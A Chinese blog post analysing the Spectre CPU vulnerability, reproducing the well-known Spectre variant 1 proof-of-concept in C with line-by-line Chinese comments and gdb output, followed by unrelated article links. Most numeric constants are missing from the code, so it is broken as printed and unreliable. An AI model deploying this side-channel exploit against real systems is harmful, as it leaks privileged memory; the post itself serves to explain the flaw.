下面一句话转自360:

现代处理器(CPU)的运作机制中存在两个用于加速执行的特性,推测执行( Speculative Execution)和间接分支预测(Indirect Branch Prediction)。

表面上看,处理器是依次顺序执行既定的处理器指令。但是,现代处理器为了更好利用处理器资源,已经开始启用并行执行,这个技术已经应用了20年左右 (1995 年开始)。假设,基于猜测或概率的角度,在当前的指令或分支还未执行完成前就开始执行可能会被执行的指令或分支,会发生什么?如果猜对了,直接使用, CPU 执行加速了。如果猜测不正确,则取消操作并恢复到原来的现场(寄存器,内存等),结果会被忽略。整个过程并不会比没有猜测的时候慢,即 CPU的推测执行( Speculative Execution )技术。

不幸的是,尽管架构状态被回滚了,仍然有些副作用,比如TLB或缓存状态并没有被回滚。这些副作用随后可以被黑客通过旁道攻击 (Side Channel Attack) 的方式获取到缓存的内容。如果攻击者能触发推测执行去访问指定的敏感数据区域的话,就可能可以读取到更高特权级的敏感数据。

此漏洞是cpu架构问题(即cache不检查权限)。不是具体软件或者硬件漏洞,因而具有广泛的影响。

下面本文对幽灵代码进行分析。

 #include <stdio.h>

 #include <stdlib.h>

 #include <stdint.h>

 #ifdef _MSC_VER

 #include <intrin.h> /* for rdtscp and clflush */

 #pragma optimize("gt", on)

 #else

 #include <x86intrin.h> /* for rdtscp and clflush */

 #endif

 /********************************************************************

  Victim code.

  ********************************************************************/

 unsigned int array1_size = ; //

 uint8_t unused1[];//uint8_t不是int类型,是char类型:typedef unsigned char   uint8_t;  int8_t才是typedef signed   char   int8_t;      //有符号8位数 

 uint8_t array1[] = {, , , , , , , , , , , , , , , }; //从该数值进行越界读

 uint8_t unused2[];

 uint8_t array2[ * ]; //通过读取该数组某个值来获取读取速度,从而判断某个内存页面是否加载,从而获取到数组的索引值,即array1的越界值。k=array1[x]。

 char *secret = "The Magic Words are Squeamish Ossifrage.";

 uint8_t temp = ; /* Used so compiler won’t optimize out victim_function()即防止指令被优化 */

 void victim_function(size_t x)

 {

     if (x < array1_size)

     {

         temp &= array2[array1[x] * ]; //漏洞点:分支的判断。当array1_size没有从cache获取,同时几次训练都会读取array1[x],当传入恶意索引x时,也会读取,从而越界。

     }

 }

 /********************************************************************

  Analysis code

  ********************************************************************/

 #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

 /* Report best guess in value[0] and runner-up in value[1] */

 void readMemoryByte(size_t malicious_x, uint8_t value[], int score[])

 {

     static int results[]; //对索引命中次数计算

     int tries, i, j, k, mix_i, junk = ;

     size_t training_x, x;

     register uint64_t time1, time2;

     volatile uint8_t *addr;

     for (i = ; i < ; i++)

         results[i] = ;                   //结果清0

     for (tries = ; tries > ; tries--) /*反复读取恶意地址的值,获取最高和次高概率的索引。*/

     {

         /* Flush array2[256*(0..255)] from cache */

         for (i = ; i < ; i++)

             _mm_clflush(&array2[i * ]); /* intrinsic for clflush instruction 将所有array2所有页面清空*/

         /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) 5个训练:1次攻击 */

         training_x = tries % array1_size; //%16,training_x为正常访问

         for (j = ; j >= ; j--)

         {

             _mm_clflush(&array1_size);

             for (volatile int z = ; z < ; z++)

             {

             } /* Delay (can also mfence) */

             /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 ,每6次有一次为恶意访问*/

             /* Avoid jumps in case those tip off the branch predictor */

             x = ((j % ) - ) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */

             x = (x | (x >> ));         /* Set x=-1 if j&6=0, else x=0 */

             x = training_x ^ (x & (malicious_x ^ training_x));

             /* Call the victim! */

             victim_function(x);

         }

         /* Time reads. Order is lightly mixed up to prevent stride prediction */

         for (i = ; i < ; i++)

         {

             mix_i = ((i * ) + ) & ;

             addr = &array2[mix_i * ];

             time1 = __rdtscp(&junk);         /* READ TIMER */

             junk = *addr;                    /* MEMORY ACCESS TO TIME */

             time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */

             if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])

                 results[mix_i]++; /* cache hit - add +1 to score for this value 缓存中有该数组值对应的页面,则对应的数组索引分数+1*/

         }

         /* Locate highest & second-highest results results tallies in j/k,获取最高和次高分数的索引*/

         j = k = -;

         for (i = ; i < ; i++)

         {

             if (j <  || results[i] >= results[j])

             {

                 k = j;

                 j = i;

             }

             else if (k <  || results[i] >= results[k])

             {

                 k = i;

             }

         }

         if (results[j] >= ( * results[k] + ) || (results[j] ==  && results[k] == ))

             break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */

     }

     results[] ^= junk; /* use junk so code above won’t get optimized out*/

     value[] = (uint8_t)j;

     score[] = results[j];

     value[] = (uint8_t)k;

     score[] = results[k];

 }

 int main(int argc, const char **argv)

 {

     size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
      printf("secret_addr:%p,array1_addr:%p.\n",(void *)secret,(void *)array1);

     int i, score[], len = ;

     uint8_t value[];

     for (i = ; i < sizeof(array2); i++)

         array2[i] = ; /* write to array2 so in RAM not copy-on-write zero pages */

     if (argc == )

     {

         sscanf(argv[], "%p", (void **)(&malicious_x));

         malicious_x -= (size_t)array1; /* Convert input value into a pointer */

         sscanf(argv[], "%d", &len);

     }

     printf("Reading %d bytes:\n", len);

     while (--len >= )

     {

         printf("Reading at malicious_x = %p... ", (void *)malicious_x);

         readMemoryByte(malicious_x++, value, score);

         printf("%s: ", (score[] >=  * score[] ? "Success" : "Unclear"));//判断标准

         printf("0x%02X=’%c’ score=%d ", value[],(value[] >  && value[] <  ? value[] : ’?’), score[]);

         if (score[] > )

         printf("(second best: 0x%02X score=%d)", value[], score[]);

     }

 }

实际调试:

secret_addr:0x400d18,array1_addr:0x6020a0.

gdb-peda$ x/8s 0x400d18
0x400d18: "The Magic Words are Squeamish Ossifrage."

gdb-peda$ x/8xw 0x6020a0
0x6020a0 <array1>: 0x04030201 0x08070605 0x0c0b0a09 0x100f0e0d

gdb-peda$ p malicious_x
$2 = 0xffffffffffdfec78//显然是负数,所以后面打印的是相对地址,不是绝对地址。

spectre漏洞代码分析-c代码的更多相关文章

  1. 常用 Java 静态代码分析工具的分析与比较

    常用 Java 静态代码分析工具的分析与比较 简介: 本文首先介绍了静态代码分析的基 本概念及主要技术,随后分别介绍了现有 4 种主流 Java 静态代码分析工具 (Checkstyle,FindBu ...

  2. [转载] 常用 Java 静态代码分析工具的分析与比较

    转载自http://www.oschina.net/question/129540_23043 简介: 本文首先介绍了静态代码分析的基本概念及主要技术,随后分别介绍了现有 4 种主流 Java 静态代 ...

  3. 20165223《网络对抗技术》Exp4 恶意代码分析

    目录 -- 恶意代码分析 恶意代码分析说明 实验任务目标 实验内容概述 schtasks命令使用 实验内容 系统运行监控 恶意软件分析 静态分析 virscan分析和VirusTotal分析 PEiD ...

  4. Thrift 代码分析

    Thrift的基本结束 Thrift是一个跨语言的服务部署框架,最初由Facebook于2007年开发,2008年进入Apache开源项目.Thrift通过IDL(Interface Definiti ...

  5. 【转载】常用 Java 静态代码分析工具的分析与比较

    摘自:http://www.oschina.net/question/129540_23043常用 Java 静态代码分析工具的分析与比较 简介: 本文首先介绍了静态代码分析的基本概念及主要技术,随后 ...

  6. java代码分析及分析工具

    一个项目从搭建开始,开发的初期往往思路比较清晰,代码也比较清晰.随着时间的推移,业务越来越复杂.代码也就面临着耦合,冗余,甚至杂乱,到最后谁都不敢碰. 作为一个互联网电子商务网站的业务支撑系统,业务复 ...

  7. GCN代码分析 2019.03.12 22:34:54字数 560阅读 5714 本文主要对GCN源码进行分析。

    GCN代码分析   1 代码结构 . ├── data // 图数据 ├── inits // 初始化的一些公用函数 ├── layers // GCN层的定义 ├── metrics // 评测指标 ...

  8. 常用Java静态代码分析工具的分析与比较

    给国产静态代码检测工具Pinpoint打Call! 简介 本文首先介绍了静态代码分析的基本概念及主要技术,随后分别介绍了4种现有的主流Java静态代码分析工具 (Checkstyle,FindBugs ...

  9. ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl 漏洞及攻击代码分析

    攻击代码网址:http://www.exploit-db.com/exploits/394/ 1.执行环境: 1.ProFTPD 1.3.0/1.3.0a 2.编译ProFTPD时.--enable- ...

随机推荐

  1. 前端PHP入门-017-系统内置函数-会查阅API

    大家要知道未来这就是你的工具 如果代码能赚钱,帮你赚钱最多的是基本语法 如果你还在当程序员,你最好的伙伴就是手册 问问你自己:你有CSS2.0/3.0手册,JavaScript手册,Jquery手册, ...

  2. 数据分析与展示---Numpy入门

    概括: 一:数据维度 (一)一维数据 (二)二维数据 (三)多维数据 (四)高维数据 二:Numpy的数组对象:ndarray (一)Numpy介绍 (二)N维数组对象ndarray (三)ndarr ...

  3. NOIP模拟5

    期望得分:100+100+100=300 实际得分:72+12+0=84 T1  [CQOI2009]中位数图 令c[i]表示前i个数中,比d大的数与比d小的数的差,那么如果c[l]=c[r],则[l ...

  4. [php]referer应用--http防盗链技术

    1.防盗链的理解 所谓防盗链是防止其他的网站引用自己网站的资源连接,比如图片.视频等等,但是并不会阻碍从自己网站上享受资源的用户,这就要求能够将其他网站的连接请求阻止 2.防盗链的原理 其实从自己网站 ...

  5. UIWebView---iOS-Apple苹果官方文档翻译

    CHENYILONG Blog UIWebView---iOS-Apple苹果官方文档翻译 UIWebView 技术博客http://www.cnblogs.com/ChenYilong/ 新浪微博h ...

  6. LeetCode之数据流中第一个唯一的数字

    使用一个Map维护数字出现的次数,使用一个链表维护只出现一次的数,使用一个变量记录是否找到过终止数字. AC代码: public class Solution { /* * @param : a co ...

  7. 35、def func(a,b=[]) 这种写法有什么坑?

    那我们先通过程序看看这个函数有什么坑吧! def func(a,b=[]): b.append(a) print(b) func(1) func(1) func(1) func(1) 看下结果 [1] ...

  8. ConcurrentHashMap分析

    1.ConcurrentHashMap锁分段技术                     ConcurrentHashMap使用锁分段技术,首先将数据分成一段一段地存储,然后给每一段数据配一把锁,当一 ...

  9. 安装完ODTwithODAC112012,出现ORA-12560:TNS:协议适配器错误

    参考:http://blog.csdn.net/tan_yixiu/article/details/6762357 操作系统:windows2008 Enterprise 64位 开发工具:VS201 ...

  10. $fhqTreap$

    - $fhqTreap$与$Treap$的差异 $fhqTreap$是$Treap$的非旋版本,可以实现一切$Treap$操作,及区间操作和可持久化 $fhqTreap$非旋关键在于分裂与合并$(Sp ...